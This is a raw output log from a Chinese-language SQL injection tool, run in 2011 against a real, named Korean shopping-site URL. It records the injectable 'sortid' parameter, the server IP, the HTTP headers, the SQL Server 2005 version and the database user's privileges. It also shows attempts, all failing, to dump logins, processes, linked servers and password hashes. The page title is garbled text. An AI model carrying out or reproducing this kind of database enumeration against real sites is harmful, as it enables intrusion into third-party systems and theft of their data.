■漏洞信息:============================================================
 ・URL:http://www.playn.co.kr/store/mall/pf_list.asp?sortid=1111113
 ・页面标题：康拳,父拳,款技,霸烙,版前,楷抗,盲泼,碱俏
 ・参数:sortid=1111113
 ・方法:GET
 ・类型:Numeric
 ・利用方法:And
 ・脚本语言:asp
 ・IP:121.189.62.111
 ・数据库:SQL Server
 ・HEAD:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 03 Apr 2011 11:21:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 33146
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCBCBACC=ABMABILDNKBPPPDFEFIGCDBE; path=/
Cache-control: private



■数据库信息:============================================================
批次获取基本信息失败，开始逐一获取……
 ・当前数据库:playn
 ・版本:Microsoft SQL Server 2005 - 9.00.1406.00 (Intel X86) 
	Mar  3 2007 18:40:02 
	Copyright (c) 1988-2005 Microsoft Corporation
	Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

■发现SQL2005，建议您先切换到 '杂项工具' 标签页面开启相关设置。
 ・当前用户权限：
sysadmin(sa): 0
dbcreator): 0
bulkadmin: 0
diskadmin: 0
serveradmin: 0
public: 1
db_owner: 1
db_backupoperator: 0
db_datawriter: 0

 ・数据库信息:
db_name	filename
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

 ・SQL Server用户名列表：
用户名		角色		安全编号
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

 ・数据库相关进程信息:
程序名	状态	主机名	主机进程ID	命令行	NT用户名
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

 ・链接的服务器信息:
服务器名	服务器产品	提供者名	数据源	位置	服务器网络名
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

 ・数据库用户登录信息：
用户名	密码HASH	数据库编号	语言	时间1	时间2
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

